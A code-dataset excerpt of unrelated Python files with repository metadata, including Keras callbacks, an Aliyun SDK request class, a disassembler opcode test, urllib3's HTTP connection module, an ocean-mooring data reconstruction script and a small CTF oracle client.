- `on_train_begin` and `on_train_end` expect one positional argument:
`logs`
Arguments:
on_epoch_begin: called at the beginning of every epoch.
on_epoch_end: called at the end of every epoch.
on_batch_begin: called at the beginning of every batch.
on_batch_end: called at the end of every batch.
on_train_begin: called at the beginning of model training.
on_train_end: called at the end of model training.
Example:
```python
# Print the batch number at the beginning of every batch.
batch_print_callback = LambdaCallback(
on_batch_begin=lambda batch,logs: print(batch))
# Stream the epoch loss to a file in JSON format. The file content
# is not well-formed JSON but rather has a JSON object per line.
import json
json_log = open('loss_log.json', mode='wt', buffering=1)
json_logging_callback = LambdaCallback(
on_epoch_end=lambda epoch, logs: json_log.write(
json.dumps({'epoch': epoch, 'loss': logs['loss']}) + '\n'),
on_train_end=lambda logs: json_log.close()
)
# Terminate some processes after having finished model training.
processes = ...
cleanup_callback = LambdaCallback(
on_train_end=lambda logs: [
p.terminate() for p in processes if p.is_alive()])
model.fit(...,
callbacks=[batch_print_callback,
json_logging_callback,
cleanup_callback])
```
"""
def __init__(self,
on_epoch_begin=None,
on_epoch_end=None,
on_batch_begin=None,
on_batch_end=None,
on_train_begin=None,
on_train_end=None,
**kwargs):
super(LambdaCallback, self).__init__()
self.__dict__.update(kwargs)
if on_epoch_begin is not None:
self.on_epoch_begin = on_epoch_begin
else:
self.on_epoch_begin = lambda epoch, logs: None
if on_epoch_end is not None:
self.on_epoch_end = on_epoch_end
else:
self.on_epoch_end = lambda epoch, logs: None
if on_batch_begin is not None:
self.on_batch_begin = on_batch_begin
else:
self.on_batch_begin = lambda batch, logs: None
if on_batch_end is not None:
self.on_batch_end = on_batch_end
else:
self.on_batch_end = lambda batch, logs: None
if on_train_begin is not None:
self.on_train_begin = on_train_begin
else:
self.on_train_begin = lambda logs: None
if on_train_end is not None:
self.on_train_end = on_train_end
else:
self.on_train_end = lambda logs: None
| [
"[email protected]"
] | |
e8f99e195a00a7eb686066deabd7198bdbd95ded | 0db97db08743783019efe022190f409d22ff95bd | /aliyun/api/rest/Cdn20141111DescribeCdnMonitorDataRequest.py | 589fb0bb77c88eb908d460a95e93610af5c76c7d | [
"Apache-2.0"
] | permissive | snowyxx/aliyun-python-demo | 8052e2a165f1b869affe632dda484d6ca203bd9b | ed40887ddff440b85b77f9b2a1fcda11cca55c8b | refs/heads/master | 2021-01-10T03:37:31.657793 | 2016-01-21T02:03:14 | 2016-01-21T02:03:14 | 49,921,095 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | '''
Created by auto_sdk on 2014.11.27
'''
from aliyun.api.base import RestApi
class Cdn20141111DescribeCdnMonitorDataRequest(RestApi):
def __init__(self,domain='cdn.aliyuncs.com',port=80):
RestApi.__init__(self,domain, port)
self.DomainName = None
self.EndTime = None
self.StartTime = None
def getapiname(self):
return 'cdn.aliyuncs.com.DescribeCdnMonitorData.2014-11-11'
| [
"[email protected]"
] | |
0f787c236ec1a8d885a4ef087fc082373227c8bc | 7f523c407d45d116860eff67f079e807f2b53339 | /src/third_party/beaengine/tests/0fc0.py | 0ac3b3878d9ad1a76c66fa1cc72d3a95f77ed24d | [
"LGPL-3.0-only",
"LGPL-2.0-or-later",
"MIT"
] | permissive | 0vercl0k/rp | a352c96bfe3715eb9ce8c5942831123e65289dac | b24e7f58a594aaf0ce3771745bf06862f6ecc074 | refs/heads/master | 2023-08-30T08:03:14.842828 | 2023-08-09T00:41:00 | 2023-08-09T00:41:00 | 3,554,173 | 1,557 | 239 | MIT | 2023-08-09T00:41:02 | 2012-02-26T19:26:33 | C++ | UTF-8 | Python | false | false | 2,280 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
# @author : [email protected]
from headers.BeaEnginePython import *
from nose.tools import *
class TestSuite:
def test(self):
# 0F c0 /r
# XADD r/m8, r8
Buffer = bytes.fromhex('0fc09011223344')
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0')
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd')
assert_equal(myDisasm.repr(), 'xadd byte ptr [rax+44332211h], dl')
assert_equal(myDisasm.infos.Operand1.AccessMode, READ + WRITE)
assert_equal(myDisasm.infos.Operand2.AccessMode, READ + WRITE)
# REX + 0F C0 /r
# XADD r/m8*, r8*
Buffer = bytes.fromhex('410fc09011223344')
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0')
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd')
assert_equal(myDisasm.infos.Operand1.AccessMode, READ + WRITE)
assert_equal(myDisasm.infos.Operand2.AccessMode, READ + WRITE)
assert_equal(myDisasm.repr(), 'xadd byte ptr [r8+44332211h], dl')
# if LOCK and destination is not memory
Buffer = bytes.fromhex('f00fc0c011223344')
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0')
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd')
assert_equal(myDisasm.repr(), 'lock xadd al, al')
assert_equal(myDisasm.infos.Reserved_.ERROR_OPCODE, UD_)
| [
"[email protected]"
] | |
99987cf070bb316131b7d0ea14e3388a616f9a15 | 20be441085d9a9ae41dcf8e4dd5f416bcd3f22da | /botapi/type_cast.py | ad3483bde31f98a71ed76a913e083021fa977960 | [
"Apache-2.0"
] | permissive | santarovich/botapi | 928aaf48c44167b6893c51df738b9dc50873073a | dfb5161be08d0c045d70e023842144c4a18e012c | refs/heads/master | 2023-03-16T10:51:00.997084 | 2020-12-22T09:33:44 | 2020-12-22T09:33:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,052 | py | from datetime import datetime
from typing import Any
from .exceptions import TypeCastException
from .serialize import SerializableModel
from .types import TypedList, DateTime
def type_cast(func):
def wrapper(var_name: str, value: Any, *args, **kwargs):
if value is None:
return None
return func(var_name, value, *args, **kwargs)
return wrapper
class TypeCast:
@staticmethod
@type_cast
def cast(var_name: str, value: Any, var_type: Any = None, *args, **kwargs) -> Any:
"""
Casts the value to the new_type. If new_type is TypedList, casts every
item of value to item_type if item_type is not None
:param var_name: name of the attribute (used to raise errors)
:param value: value to cast
:param var_type: desired type
:return: casted value
"""
if var_type is None or isinstance(value, var_type):
return value
elif issubclass(var_type, SerializableModel) and isinstance(value, dict):
return var_type(**value)
elif issubclass(var_type, datetime) and type(value) == str:
return datetime.fromisoformat(value)
else:
raise TypeCastException(var_name, value, var_type)
@staticmethod
@type_cast
def datetime_cast(var_name, value, date_format: str = None, *args, **kwargs):
"""Returns DateTime casted from value
:param var_name: name of the attribute (used to raise errors)
:param value: str or datetime object
:param date_format: str with date format
:return: DateTime
"""
if type(value) == str:
if date_format is None:
result = DateTime.fromisoformat(value)
else:
result = DateTime.strptime(value, date_format)
elif type(value) == DateTime:
result = value
elif isinstance(value, datetime):
result = DateTime(
value.year,
value.month,
value.day,
value.hour,
value.minute,
value.second,
value.microsecond,
value.tzinfo
)
else:
raise TypeCastException(var_name, value, DateTime)
result.set_format(date_format=date_format)
return result
@staticmethod
@type_cast
def typed_list_cast(var_name, value, item_type=None, *args, **kwargs) -> TypedList:
"""Returns TypedList with type casted items
:param var_name: name of the attribute (used to raise errors)
:param value: iterable to cast
:param item_type: type of EVERY item
:return: TypedList
"""
if item_type is None:
return TypedList(value, None)
elif issubclass(item_type, SerializableModel):
return TypedList([
TypeCast.cast(var_name, item, item_type) for item in value
], item_type)
else:
return TypedList(value, item_type)
| [
"[email protected]"
] | |
f7503c9a867b753e4c09c2fade37efbef3ea46d8 | 9c73eccb0f27ee98452864e6388802e1c0a9e51c | /py_tdlib/constructors/stickers.py | 4e1794bd2471db1a883cd9ab46fffe75f0da5e8d | [
"MIT"
] | permissive | Tempah28/python-tdlib | 32a684cba6f5b8fcd5673d01a06f926304d29c5b | 925781f2ef9e386dab437334048c798fa9cb945f | refs/heads/master | 2020-03-31T00:16:06.943269 | 2018-10-05T14:16:12 | 2018-10-05T14:16:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,549 | py | from ..factory import Method, Type
class stickers(Type):
# a list of stickers @stickers List of stickers
stickers = None # type: "vector<sticker>"
class getStickers(Method):
# stickers from the installed sticker sets that correspond to
# given emoji. If the emoji is not empty, favorite
# recently used stickers may also be returned @emoji String
# of emoji. If empty, returns all known installed stickers
# Maximum number of stickers to be returned
emoji = None # type: "string"
limit = None # type: "int32"
class searchStickers(Method):
# for stickers from public sticker sets that correspond to
# given emoji @emoji String representation of emoji; must be
# @limit Maximum number of stickers to be returned
emoji = None # type: "string"
limit = None # type: "int32"
class getRecentStickers(Method):
# a list of recently used stickers @is_attached Pass true
# return stickers and masks that were recently attached to
# or video files; pass false to return recently sent
is_attached = None # type: "Bool"
class addRecentSticker(Method):
# adds a new sticker to the list of recently
# stickers. The new sticker is added to the top
# the list. If the sticker was already in the
# it is removed from the list first. Only stickers
# to a sticker set can be added to this
is_attached = None # type: "Bool"
sticker = None # type: "InputFile"
class getFavoriteStickers(Method):
# favorite stickers
pass
| [
"andrew@localhost"
] | andrew@localhost |
159c3758b380920b7b9c253c437fa4ad4939b8f9 | e8e4bb89c6ce57c038de445091ddebc1c1b6eb26 | /DataProcessing_1418merged/CF1_merged_reconstruction.py | 207351cab222fb8c1799a14ab3f481dc095780f2 | [] | no_license | ilebras/OSNAP | dc7fba846f866ec64edab35a278d2ce6c86e5f97 | a5b22026351d2eb8dc4c89e2949be97122936d23 | refs/heads/master | 2021-05-12T16:46:18.955345 | 2020-09-08T23:04:23 | 2020-09-08T23:04:23 | 117,025,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,880 | py | from firstfuncs_1618 import *
dat16=xr.open_dataset(datadir+'OSNAP2016recovery/mcat_nc/CF1_2016recovery_dailymerged.nc')
dat16_recon=xr.open_dataset(datadir+'OSNAP2016recovery/mcat_nc/CF1_recon_2016recovery_dailymerged.nc')
dat18=xr.open_dataset(datadir+'OSNAP2018recovery/mcat_nc/CF1_2018recovery_dailymerged.nc')
def plot_overview(dat1,dat2):
f,[ax1,ax2,ax3]=subplots(3,1,figsize=(12,15),sharex=True)
ax1.plot(dat1.TIME,dat1.PRES)
ax1.plot(dat2.TIME,dat2.PRES)
ax1.invert_yaxis()
ax1.set_ylabel('pressure [db]')
ax2.plot(dat1.TIME,dat1.PTMP)
ax2.plot(dat2.TIME,dat2.PTMP)
ax2.set_ylabel('pot. temperature [$^\circ$C]')
ax3.plot(dat1.TIME,dat1.PSAL)
ax3.plot(dat2.TIME,dat2.PSAL)
ax3.set_ylabel('practical salinity []')
plot_overview(dat16_recon,dat18)
savefig(figdir+'merging_overview/CF1_overview_16recon_w18.png')
def TSplot(dat1,dat2):
figure(figsize=(9,8))
plot(dat1.PSAL,dat1.PTMP,'o',alpha=0.3)
plot(dat2.PSAL,dat2.PTMP,'o',alpha=0.3)
xlabel('practical salinity []')
ylabel('pot. temperature [$^\circ$C]')
TSplot(dat16_recon,dat18)
savefig(figdir+'merging_overview/CF1_TS_16recon_w18.png')
#############################################################################
############ The first deployment reconstruction does not look bad,
####### Going to leave as is and try something similar for the second deployment
#############################################################################
# I actually only have to reconstruct the 50dbar data.
def plot_diff_manyways(axx,thediff,colch,labch):
axx.plot(dat18.TIME,thediff,label='',alpha=0.5,color=colch)
axx.plot(dat18.resample(TIME='1M').mean(dim='TIME').TIME,thediff.resample(TIME='1M').mean(dim='TIME'),'o-',color=colch,linewidth=3,label=labch)
axx.axhline(mean(thediff),color=colch)
#############################################################################
############ Reconstruct using both instruments, see how well they agree
##### Use same method as first deployment: constant t offset, monthly s offset
#############################################################################
mtime=(dat18).resample(TIME='1M').mean(dim='TIME').TIME
sal_mdiff={}
sal_mdiff['from100']=(dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=100)).resample(TIME='1M').mean(dim='TIME')
sal_mdiff['from200']=(dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=200)).resample(TIME='1M').mean(dim='TIME')
sal_mdiff_fill_100=linspace(sal_mdiff['from100'][8],sal_mdiff['from100'][0],5)
sal_mdiff_fill_200=linspace(sal_mdiff['from200'][8],sal_mdiff['from200'][0],5)
sal_mdiff_int={}
sal_mdiff_int['from100']=hstack((sal_mdiff['from100'][:9],sal_mdiff_fill_100[1:-1],sal_mdiff['from100'][:9],sal_mdiff_fill_100[1:-1],sal_mdiff['from100'][:2]))
sal_mdiff_int['from200']=hstack((sal_mdiff['from200'][:9],sal_mdiff_fill_200[1:-1],sal_mdiff['from200'][:9],sal_mdiff_fill_200[1:-1],sal_mdiff['from200'][:2]))
# Plot the difference between 50db instrument temp and sal with the two other instruments.
def plot_saltmp_diff():
f,[ax1,ax2]=subplots(2,1,figsize=(12,10),sharex=True)
plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=100),'C0','50m-100m')
ax1.plot(mtime,sal_mdiff_int['from100'],'o-',color='C0')
plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=200),'C1','50m-200m')
ax1.plot(mtime,sal_mdiff_int['from200'],'o-',color='C1')
plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=100)-dat18.PSAL.sel(DEPTH=200),'C2','100m-200m')
ax1.axhline(0,color='k')
ax1.legend()
ax1.set_ylabel('salinity difference')
plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=100),'C0','50m-100m')
plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=200),'C1','50m-200m')
plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=100)-dat18.PTMP.sel(DEPTH=200),'C2','100m-200m')
ax2.axhline(0,color='k')
ax2.set_ylabel('temperature difference')
plot_saltmp_diff()
savefig(figdir+'merging_overview/CF1_saltmpdiff.png')
ptmp_r50={}
ptmp_r50['from100']=dat18.PTMP.sel(DEPTH=100)+mean(dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=100))
ptmp_r50['from200']=dat18.PTMP.sel(DEPTH=200)+mean(dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=200))
def toTimestamp(d):
return calendar.timegm(d.timetuple())
def to_datetime_andordinal(date):
"""
Converts a numpy datetime64 object to a python datetime object
Input:
date - a np.datetime64 object
Output:
DATE - a python datetime object
"""
timestamp = ((date - np.datetime64('1970-01-01T00:00:00'))
/ np.timedelta64(1, 's'))
dtimeobj=datetime.datetime.utcfromtimestamp(timestamp)
return datetime.datetime.toordinal(dtimeobj)
time_month=[to_datetime_andordinal(ddd) for ddd in mtime.values]
time_all=[to_datetime_andordinal(ddd) for ddd in dat18.TIME.values]
f100=interp1d(time_month,sal_mdiff_int['from100'],bounds_error=False)
f200=interp1d(time_month,sal_mdiff_int['from200'],bounds_error=False)
sal_mdiff_fulltime={}
sal_mdiff_fulltime['from100']=f100(time_all)
sal_mdiff_fulltime['from200']=f200(time_all)
psal_r50={}
psal_r50['from100']=dat18.PSAL.sel(DEPTH=100)+sal_mdiff_fulltime['from100']
psal_r50['from200']=dat18.PSAL.sel(DEPTH=200)+sal_mdiff_fulltime['from200']
def comp_from100200():
f,[ax1,ax2]=subplots(2,1,figsize=(12,10))
ptmp_r50['from100'].plot(ax=ax1,label='from 100m')
ptmp_r50['from200'].plot(ax=ax1,label='from 200m')
dat18.PTMP.sel(DEPTH=50).plot(ax=ax1,label='directly measured')
ax1.legend()
ax1.set_title('')
psal_r50['from100'].plot(ax=ax2,label='from 100m')
psal_r50['from200'].plot(ax=ax2,label='from 200m')
dat18.PSAL.sel(DEPTH=50).plot(ax=ax2,label='directly measured')
ax2.set_title('')
comp_from100200()
###############################################################################
##### Save a reconstructed product which keeps recorder 50m data
#### And adds the 100m reconstruction beyond that
#### This is simply because the 100m is present,closer and noisier
#### It wouldn't make sense for 50m instrument to have less variability
################################################################################
dat18_recon=dat18.copy()
dat18_recon['PSAL'].sel(DEPTH=50)[isnan(dat18['PSAL'].sel(DEPTH=50))]=psal_r50['from100'][isnan(dat18['PSAL'].sel(DEPTH=50))].values
dat18_recon['PTMP'].sel(DEPTH=50)[isnan(dat18['PTMP'].sel(DEPTH=50))]=ptmp_r50['from100'][isnan(dat18['PTMP'].sel(DEPTH=50))].values
dat18_recon['PRES'].sel(DEPTH=50)[isnan(dat18['PRES'].sel(DEPTH=50))]=mean(dat18['PRES'].sel(DEPTH=50))
plot(dat18_recon['PRES']);
plot_overview(dat16_recon,dat18_recon)
savefig(figdir+'merging_overview/CF1_overview_1618recon.png')
dat18_recon.to_netcdf(datadir+'OSNAP2018recovery/mcat_nc/CF1_mcat_recon_2018recovery_daily.nc','w',format='netCDF4')
| [
"[email protected]"
] | |
0564a1a72dcfd96a4e5f97d467c399d260cf2044 | 6ba8a0ebb55fee0406da9e4c6784def6391cf61b | /pyartcd/pyartcd/cli.py | 62569db660eb11953ff60867489214cead41a104 | [
"Apache-2.0"
] | permissive | gabemontero/aos-cd-jobs | a354d680250bf306a90a24ec5023cf203658df59 | 0208570f5bf14d6f9672da84b0edb6cffaaded92 | refs/heads/master | 2021-09-28T04:57:13.789002 | 2021-09-21T09:18:05 | 2021-09-21T09:18:05 | 96,802,806 | 0 | 0 | null | 2017-07-10T17:17:20 | 2017-07-10T17:17:20 | null | UTF-8 | Python | false | false | 2,047 | py | import asyncio
from functools import update_wrapper
import logging
from pathlib import Path
from typing import Optional
import click
from pyartcd.runtime import Runtime
pass_runtime = click.make_pass_decorator(Runtime)
def click_coroutine(f):
""" A wrapper to allow to use asyncio with click.
https://github.com/pallets/click/issues/85
"""
f = asyncio.coroutine(f)
def wrapper(*args, **kwargs):
loop = asyncio.get_event_loop()
return loop.run_until_complete(f(*args, **kwargs))
return update_wrapper(wrapper, f)
# ============================================================================
# GLOBAL OPTIONS: parameters for all commands
# ============================================================================
@click.group(context_settings=dict(help_option_names=['-h', '--help']))
@click.option("--config", "-c", metavar='PATH',
help="Configuration file ('~/.config/artcd.toml' by default)")
@click.option("--working-dir", "-C", metavar='PATH', default=None,
help="Existing directory in which file operations should be performed (current directory by default)")
@click.option("--dry-run", is_flag=True,
help="don't actually execute the pipeline; just print what would be done")
@click.option("--verbosity", "-v", count=True,
help="[MULTIPLE] increase output verbosity")
@click.pass_context
def cli(ctx: click.Context, config: Optional[str], working_dir: Optional[str], dry_run: bool, verbosity: int):
config_filename = config or Path("~/.config/artcd.toml").expanduser()
working_dir = working_dir or Path.cwd()
# configure logging
if not verbosity:
logging.basicConfig(level=logging.WARNING)
elif verbosity == 1:
logging.basicConfig(level=logging.INFO)
elif verbosity >= 2:
logging.basicConfig(level=logging.DEBUG)
else:
raise ValueError(f"Invalid verbosity {verbosity}")
ctx.obj = Runtime.from_config_file(config_filename, working_dir=Path(working_dir), dry_run=dry_run)
| [
"[email protected]"
] | |
5e03d1a71d8a7262ee7ec1c4f55eb8fa0a2af5da | b48ca98425b9510d16623277a0761a33c00d028d | /SeatReservation-Version3.0/SeatReservation-master/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/_vendor/requests/packages/urllib3/connection.py | 496d7048b6cdceee53feae1715a631d048b1b441 | [] | no_license | billgoo/WHULibSeatReservation | f74a01db19f51a2034772d932c59afd9f63c7753 | 5423ef7df253739ccf279365c1dec1ebfe7f2c4f | refs/heads/master | 2020-04-02T07:18:33.174744 | 2018-12-23T15:26:15 | 2018-12-23T15:26:15 | 154,190,237 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,923 | py |
import datetime
import logging
import os
import sys
import socket
from socket import error as SocketError, timeout as SocketTimeout
import warnings
from .packages import six
try: # Python 3
from http.client import HTTPConnection as _HTTPConnection
from http.client import HTTPException # noqa: unused in this module
except ImportError:
from http.client import HTTPConnection as _HTTPConnection
from http.client import HTTPException # noqa: unused in this module
try: # Compiled with SSL?
import ssl
BaseSSLError = ssl.SSLError
except (ImportError, AttributeError): # Platform-specific: No SSL.
ssl = None
class BaseSSLError(BaseException):
pass
try: # Python 3:
# Not a no-op, we're adding this to the namespace so it can be imported.
ConnectionError = ConnectionError
except NameError: # Python 2:
class ConnectionError(Exception):
pass
from .exceptions import (
NewConnectionError,
ConnectTimeoutError,
SubjectAltNameWarning,
SystemTimeWarning,
)
from .packages.ssl_match_hostname import match_hostname, CertificateError
from .util.ssl_ import (
resolve_cert_reqs,
resolve_ssl_version,
ssl_wrap_socket,
assert_fingerprint,
)
from .util import connection
from ._collections import HTTPHeaderDict
log = logging.getLogger(__name__)
port_by_scheme = {
'http': 80,
'https': 443,
}
RECENT_DATE = datetime.date(2014, 1, 1)
class DummyConnection(object):
"""Used to detect a failed ConnectionCls import."""
pass
class HTTPConnection(_HTTPConnection, object):
"""
Based on httplib.HTTPConnection but provides an extra constructor
backwards-compatibility layer between older and newer Pythons.
Additional keyword parameters are used to configure attributes of the connection.
Accepted parameters include:
- ``strict``: See the documentation on :class:`urllib3.connectionpool.HTTPConnectionPool`
- ``source_address``: Set the source address for the current connection.
.. note:: This is ignored for Python 2.6. It is only applied for 2.7 and 3.x
- ``socket_options``: Set specific options on the underlying socket. If not specified, then
defaults are loaded from ``HTTPConnection.default_socket_options`` which includes disabling
Nagle's algorithm (sets TCP_NODELAY to 1) unless the connection is behind a proxy.
For example, if you wish to enable TCP Keep Alive in addition to the defaults,
you might pass::
HTTPConnection.default_socket_options + [
(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1),
]
Or you may want to disable the defaults by passing an empty list (e.g., ``[]``).
"""
default_port = port_by_scheme['http']
#: Disable Nagle's algorithm by default.
#: ``[(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]``
default_socket_options = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]
#: Whether this connection verifies the host's certificate.
is_verified = False
def __init__(self, *args, **kw):
if six.PY3: # Python 3
kw.pop('strict', None)
# Pre-set source_address in case we have an older Python like 2.6.
self.source_address = kw.get('source_address')
if sys.version_info < (2, 7): # Python 2.6
# _HTTPConnection on Python 2.6 will balk at this keyword arg, but
# not newer versions. We can still use it when creating a
# connection though, so we pop it *after* we have saved it as
# self.source_address.
kw.pop('source_address', None)
#: The socket options provided by the user. If no options are
#: provided, we use the default options.
self.socket_options = kw.pop('socket_options', self.default_socket_options)
# Superclass also sets self.source_address in Python 2.7+.
_HTTPConnection.__init__(self, *args, **kw)
def _new_conn(self):
""" Establish a socket connection and set nodelay settings on it.
:return: New socket connection.
"""
extra_kw = {}
if self.source_address:
extra_kw['source_address'] = self.source_address
if self.socket_options:
extra_kw['socket_options'] = self.socket_options
try:
conn = connection.create_connection(
(self.host, self.port), self.timeout, **extra_kw)
except SocketTimeout as e:
raise ConnectTimeoutError(
self, "Connection to %s timed out. (connect timeout=%s)" %
(self.host, self.timeout))
except SocketError as e:
raise NewConnectionError(
self, "Failed to establish a new connection: %s" % e)
return conn
def _prepare_conn(self, conn):
self.sock = conn
# the _tunnel_host attribute was added in python 2.6.3 (via
# http://hg.python.org/cpython/rev/0f57b30a152f) so pythons 2.6(0-2) do
# not have them.
if getattr(self, '_tunnel_host', None):
# TODO: Fix tunnel so it doesn't depend on self.sock state.
self._tunnel()
# Mark this connection as not reusable
self.auto_open = 0
def connect(self):
conn = self._new_conn()
self._prepare_conn(conn)
def request_chunked(self, method, url, body=None, headers=None):
"""
Alternative to the common request method, which sends the
body with chunked encoding and not as one block
"""
headers = HTTPHeaderDict(headers if headers is not None else {})
skip_accept_encoding = 'accept-encoding' in headers
self.putrequest(method, url, skip_accept_encoding=skip_accept_encoding)
for header, value in list(headers.items()):
self.putheader(header, value)
if 'transfer-encoding' not in headers:
self.putheader('Transfer-Encoding', 'chunked')
self.endheaders()
if body is not None:
stringish_types = six.string_types + (six.binary_type,)
if isinstance(body, stringish_types):
body = (body,)
for chunk in body:
if not chunk:
continue
if not isinstance(chunk, six.binary_type):
chunk = chunk.encode('utf8')
len_str = hex(len(chunk))[2:]
self.send(len_str.encode('utf-8'))
self.send(b'\r\n')
self.send(chunk)
self.send(b'\r\n')
# After the if clause, to always have a closed body
self.send(b'0\r\n\r\n')
class HTTPSConnection(HTTPConnection):
default_port = port_by_scheme['https']
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT, **kw):
HTTPConnection.__init__(self, host, port, strict=strict,
timeout=timeout, **kw)
self.key_file = key_file
self.cert_file = cert_file
# Required property for Google AppEngine 1.9.0 which otherwise causes
# HTTPS requests to go out as HTTP. (See Issue #356)
self._protocol = 'https'
def connect(self):
conn = self._new_conn()
self._prepare_conn(conn)
self.sock = ssl.wrap_socket(conn, self.key_file, self.cert_file)
class VerifiedHTTPSConnection(HTTPSConnection):
"""
Based on httplib.HTTPSConnection but wraps the socket with
SSL certification.
"""
cert_reqs = None
ca_certs = None
ca_cert_dir = None
ssl_version = None
assert_fingerprint = None
def set_cert(self, key_file=None, cert_file=None,
cert_reqs=None, ca_certs=None,
assert_hostname=None, assert_fingerprint=None,
ca_cert_dir=None):
if (ca_certs or ca_cert_dir) and cert_reqs is None:
cert_reqs = 'CERT_REQUIRED'
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = cert_reqs
self.assert_hostname = assert_hostname
self.assert_fingerprint = assert_fingerprint
self.ca_certs = ca_certs and os.path.expanduser(ca_certs)
self.ca_cert_dir = ca_cert_dir and os.path.expanduser(ca_cert_dir)
def connect(self):
# Add certificate verification
conn = self._new_conn()
resolved_cert_reqs = resolve_cert_reqs(self.cert_reqs)
resolved_ssl_version = resolve_ssl_version(self.ssl_version)
hostname = self.host
if getattr(self, '_tunnel_host', None):
# _tunnel_host was added in Python 2.6.3
# (See: http://hg.python.org/cpython/rev/0f57b30a152f)
self.sock = conn
# Calls self._set_hostport(), so self.host is
# self._tunnel_host below.
self._tunnel()
# Mark this connection as not reusable
self.auto_open = 0
# Override the host with the one we're requesting data from.
hostname = self._tunnel_host
is_time_off = datetime.date.today() < RECENT_DATE
if is_time_off:
warnings.warn((
'System time is way off (before {0}). This will probably '
'lead to SSL verification errors').format(RECENT_DATE),
SystemTimeWarning
)
# Wrap socket using verification with the root certs in
# trusted_root_certs
self.sock = ssl_wrap_socket(conn, self.key_file, self.cert_file,
cert_reqs=resolved_cert_reqs,
ca_certs=self.ca_certs,
ca_cert_dir=self.ca_cert_dir,
server_hostname=hostname,
ssl_version=resolved_ssl_version)
if self.assert_fingerprint:
assert_fingerprint(self.sock.getpeercert(binary_form=True),
self.assert_fingerprint)
elif resolved_cert_reqs != ssl.CERT_NONE \
and self.assert_hostname is not False:
cert = self.sock.getpeercert()
if not cert.get('subjectAltName', ()):
warnings.warn((
'Certificate for {0} has no `subjectAltName`, falling back to check for a '
'`commonName` for now. This feature is being removed by major browsers and '
'deprecated by RFC 2818. (See https://github.com/shazow/urllib3/issues/497 '
'for details.)'.format(hostname)),
SubjectAltNameWarning
)
_match_hostname(cert, self.assert_hostname or hostname)
self.is_verified = (resolved_cert_reqs == ssl.CERT_REQUIRED or
self.assert_fingerprint is not None)
def _match_hostname(cert, asserted_hostname):
try:
match_hostname(cert, asserted_hostname)
except CertificateError as e:
log.error(
'Certificate did not match expected hostname: %s. '
'Certificate: %s', asserted_hostname, cert
)
# Add cert to exception and reraise so client code can inspect
# the cert when catching the exception, if they want to
e._peer_cert = cert
raise
if ssl:
# Make a copy for testing.
UnverifiedHTTPSConnection = HTTPSConnection
HTTPSConnection = VerifiedHTTPSConnection
else:
HTTPSConnection = DummyConnection
| [
"[email protected]"
] | |
433aa413dbbf3fa57c5763bd7eb0530e55be08f0 | 830465731dfda87b4141546262f20d74c29297bf | /Games/DagwCTF2020/TakeItBackNow/client0.py | 3e577c3492467502cc615738464b2bae91453420 | [] | no_license | jchen8tw-research/CTF | f559d7ca0e16a730335b11caeeae208c42e8bf17 | f49615c24437a9cc6a2c20d6b30cb5abf7a32b71 | refs/heads/master | 2023-03-17T12:29:08.630613 | 2021-03-23T06:31:26 | 2021-03-23T06:31:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py | # -*- coding: utf-8 -*-
"""
Created for Spring 2020 CTF
Cryptography 0
10 Points
Welcome to my sanity check. You'll find this to be fairly easy.
The oracle is found at umbccd.io:13370, and your methods are:
flg - returns the flag
tst - returns the message after the : in "tst:..."
@author: pleoxconfusa
"""
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('crypto.ctf.umbccd.io', 13370)
sock.connect(server_address)
#available methods: flg, tst.
msg = 'tst:hello'
sock.sendall(msg.encode())
data = sock.recv(1024)
print(data.decode())
sock.close() | [
"[email protected]"
] | |
